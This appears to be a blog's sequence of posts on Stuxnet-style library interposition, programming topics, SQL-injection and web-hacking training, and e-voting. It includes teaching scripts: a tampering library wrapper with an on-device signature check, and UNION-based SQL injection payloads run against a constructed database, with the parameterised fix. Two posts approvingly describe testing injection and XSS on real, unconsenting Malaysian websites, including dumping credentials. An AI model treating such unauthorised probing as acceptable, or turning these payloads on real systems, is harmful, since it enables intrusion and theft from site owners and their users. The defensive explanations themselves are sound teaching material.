Stuxnet Worm

This video comprehensively explains how a hypothetical attack could be carried out by an attacker using the Stuxnet worm. The implications are serious: it means that low-level industrial embedded systems (the PLCs and the SCADA systems that supervise them) are now confirmed targets. These systems are deployed everywhere and lack the resources to defend themselves from attack.

The technique itself is fairly straightforward. The attacker replaces the library that the programming tool uses to talk to the controller with a modified copy. Every call then passes through the attacker's code, which can alter the program as it is downloaded onto the controller and, as Stuxnet did, hand back the unmodified program when the tool reads it back, so the change is invisible from the engineering workstation.

This technique has been used for ages, in a non-malicious way. For example, my Xilinx board does not properly support my OS for programming. Thankfully, someone out there has written an open source driver to intercept all the Xilinx calls. Install this driver and the Xilinx ISE will think that it is talking to its own driver while all its calls are actually being intercepted by the wrapper.

Interesting, and cool.

This makes me think that I will probably need to build in some protection to my future cores to at least enable a limited amount of security checking of downloaded code.
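An added example, not from the video or from this post, sketching both halves of the point in Python: a drop-in replacement for the programming library that tampers with the image on download and lies on read-back, next to the kind of device-side check the previous paragraph has in mind, where the core refuses any image whose authentication tag does not verify. All class and function names are invented for the illustration, and the HMAC is a stand-in for a proper signature whose private key would live on the build machine rather than on the host running the programming tool.

```python
import hashlib
import hmac

TAG_LEN = 32  # bytes of HMAC-SHA256 appended to a signed image


class Controller:
    """Stand-in for an unprotected PLC or soft core: stores whatever it is sent."""

    def __init__(self):
        self.memory = b""

    def write_program(self, blob):
        self.memory = bytes(blob)
        return True

    def read_program(self):
        return self.memory


class ProgrammerLib:
    """The genuine library the engineering tool links against."""

    def __init__(self, ctl):
        self.ctl = ctl

    def download(self, blob):
        return self.ctl.write_program(blob)

    def upload(self):
        return self.ctl.read_program()


class InterposedLib(ProgrammerLib):
    """Drop-in replacement with the same interface: tampers on the way down and,
    on read-back, returns what the tool originally sent so the change stays hidden."""

    def __init__(self, ctl, tamper):
        super().__init__(ctl)
        self.tamper = tamper
        self.last_sent = None

    def download(self, blob):
        self.last_sent = bytes(blob)
        return super().download(self.tamper(blob))

    def upload(self):
        return self.last_sent if self.last_sent is not None else super().upload()


def sign_image(key, image):
    """Append an HMAC tag (stand-in for a real signature made on the build machine)."""
    return image + hmac.new(key, image, hashlib.sha256).digest()


class VerifyingController(Controller):
    """Core that checks the tag before committing an image to code memory."""

    def __init__(self, key):
        super().__init__()
        self.key = key
        self.rejected = 0

    def write_program(self, blob):
        body, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            self.rejected += 1
            return False
        self.memory = bytes(body)
        return True


def run_scenario():
    key = b"constructed-signing-key"   # constructed; a real key never lives on the host
    image = bytes(range(16))           # constructed program image

    def tamper(blob):                  # flip one byte of the program body
        return blob[:3] + b"\xff" + blob[4:]

    results = {}

    # 1. Unprotected controller behind the interposed library.
    plain = Controller()
    lib = InterposedLib(plain, tamper)
    lib.download(image)
    results["host_readback_matches"] = lib.upload() == image        # True, but a lie
    results["memory_matches"] = plain.read_program() == image       # False

    # 2. Verifying controller behind the same interposed library.
    guarded = VerifyingController(key)
    lib = InterposedLib(guarded, tamper)
    results["tampered_accepted"] = lib.download(sign_image(key, image))  # False
    results["rejections"] = guarded.rejected                              # 1

    # 3. Verifying controller behind the genuine library.
    guarded = VerifyingController(key)
    results["genuine_accepted"] = ProgrammerLib(guarded).download(sign_image(key, image))  # True
    results["genuine_memory_matches"] = guarded.read_program() == image                    # True
    return results


if __name__ == "__main__":
    for name, value in run_scenario().items():
        print(f"{name}: {value}")
```

The first scenario is the important one: a read-back comparison done on the host passes even though the controller's memory is wrong, because the same interposed library answers the read. Only a check performed on the device, with a key the host never holds, catches the tampering. A shared-secret HMAC as used here is weaker than a signature (anyone who extracts the key from the core can sign), and neither protects an image that was altered before it was signed.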

Physical Programming #105: Duffy Objects

I ended up giving a short 1-hour lecture at work today, about object-oriented programming. OOP is a confusing enough paradigm as it is without having to indoctrinate my kids with more behind-the-scenes stuff. However, over the course of actually explaining OOP to them, I came to realise that the reason why I understand OOP better than they do is because I understand physical programming.

So, I thought to myself, it would be useful to include a chapter in my book on OOP: a behind-the-scenes picture.

Then, while reading stuff on the Internet today, I came across something called Duff's Device. It is something that I had learned about a while ago but had forgotten. And again, I realise that it is a problem only for people who do not understand the physical programming aspects as well. It, too, will make a good example chapter for my book.

Seems like I will have to expand the physical programming aspects to include lots of behind-the-scenes examples of common operations.

Day 2 – SQL Injection

We learned about SQL injection today and were just randomly picking Malaysian websites to test it on. This is the result that I managed to get with a local organisation’s website (which shall remain nameless). I managed to find out the version of MySQL server that they were running (5.0.45) and also the account credentials for that MySQL server (root@localhost).

Nice!

Our trainer was able to exploit this further and enumerate a whole bunch of stuff, including all the user login credentials for their MySQL database, a list of all their databases and column fields, a dump of all the records of any selected database and more. This is not a bad reflection on MySQL as our trainer says that MySQL databases are amongst the hardest to attack.

However, if their system administrators are not doing their jobs correctly, things can get screwed.
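As an added example (not the trainer's material or anything from this post), the Python script below shows one way a UNION-based injection through a single unvalidated numeric parameter yields each of the things listed above: the server version, the list of tables, the column definitions and a dump of the credentials, followed by the parameterised query that shuts it all down. It uses SQLite, which ships with Python, so the data is a constructed stand-in for the target's MySQL backend; the MySQL equivalents of the functions and catalog tables are noted in the comments.

```python
import sqlite3


def make_db():
    """Constructed sample database standing in for the target site's backend."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO news  VALUES (1, 'Welcome'), (2, 'Site launch');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db


def news_title_vulnerable(db, news_id):
    # Typical of news.php?id=1: the parameter is pasted straight into the SQL text,
    # so whatever follows the number becomes part of the query.
    sql = "SELECT title FROM news WHERE id = " + news_id
    return [row[0] for row in db.execute(sql)]


def news_title_safe(db, news_id):
    # Bound parameter: the value is sent separately from the query text and can
    # never change the query's structure, however it is crafted.
    return [row[0] for row in db.execute("SELECT title FROM news WHERE id = ?", (news_id,))]


# UNION-based payloads. id = 0 matches no real row, so only the injected SELECT's
# rows come back in the page. MySQL equivalents: version(), user(),
# information_schema.tables and information_schema.columns.
PAYLOAD_VERSION = "0 UNION SELECT sqlite_version()"
PAYLOAD_TABLES = "0 UNION SELECT name FROM sqlite_master WHERE type = 'table'"
PAYLOAD_COLUMNS = "0 UNION SELECT sql FROM sqlite_master WHERE name = 'users'"
PAYLOAD_DUMP = "0 UNION SELECT username || ':' || password_hash FROM users"


def enumerate_via_injection(db):
    """Run the enumeration sequence against the vulnerable endpoint, then the safe one."""
    return {
        "version": news_title_vulnerable(db, PAYLOAD_VERSION),
        "tables": sorted(news_title_vulnerable(db, PAYLOAD_TABLES)),
        "columns": news_title_vulnerable(db, PAYLOAD_COLUMNS),
        "dump": news_title_vulnerable(db, PAYLOAD_DUMP),
        "safe": news_title_safe(db, PAYLOAD_DUMP),   # [] : payload is just an unmatched id
    }


if __name__ == "__main__":
    for step, rows in enumerate_via_injection(make_db()).items():
        print(f"{step}: {rows}")
```

The number of columns in the injected SELECT has to match the original query (one here), which is why a real attack usually starts by probing with `ORDER BY n` or `UNION SELECT NULL, NULL, ...` until the error goes away. The parameterised version needs no escaping and no blacklist; it simply never lets the input be interpreted as SQL.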

Hacker Halted – Day 1

I attended Day 1 of Hacker Halted today. I signed up for Workshop 1, on web-application hacking, because I wanted to learn more about it. Our morning started with mainly basic stuff on the underlying mechanisms behind web applications: the HTTP protocol, DNS services and whatnot.

Our afternoon session was more interesting, with our trainer, Sean Arries, showing us the information gathering aspect of web-application hacking (vulnerability analysis). This is done in order to increase the attack space of the target. The thing that I learned from this section of the training is that sites are far more vulnerable to side-channel and internal attacks than to direct external attacks.

The tools that I already knew (and which are part of every system administrator's arsenal) were things like whois, dig, nslookup, host and other network-layer stuff. However, at the application level, I learned how to use XSS Me. Manually testing cross-site scripting (XSS) is quite fun.

The basic techniques shown were really useful. We even practiced it on a number of prominent local Malaysian sites. Very interesting. Tomorrow, we get to the actual act of attacking web applications (penetration testing) and see if we can pwn any machines. I am looking forward to hacking my own websites.

Verifying Anonymity

When it comes to electronic voting, the biggest problem has always been the conflict between two requirements: the ballot must remain anonymous, yet the voter must be authenticated and the ballot verifiably tied to an eligible voter who has voted only once. There is a lot of research into schemes that satisfy both at the same time. While the following is a good step in the right direction, it rests on one specific assumption: that the ballot sheets are handed out at random. It is unlikely that this can be done both fairly and easily in practice.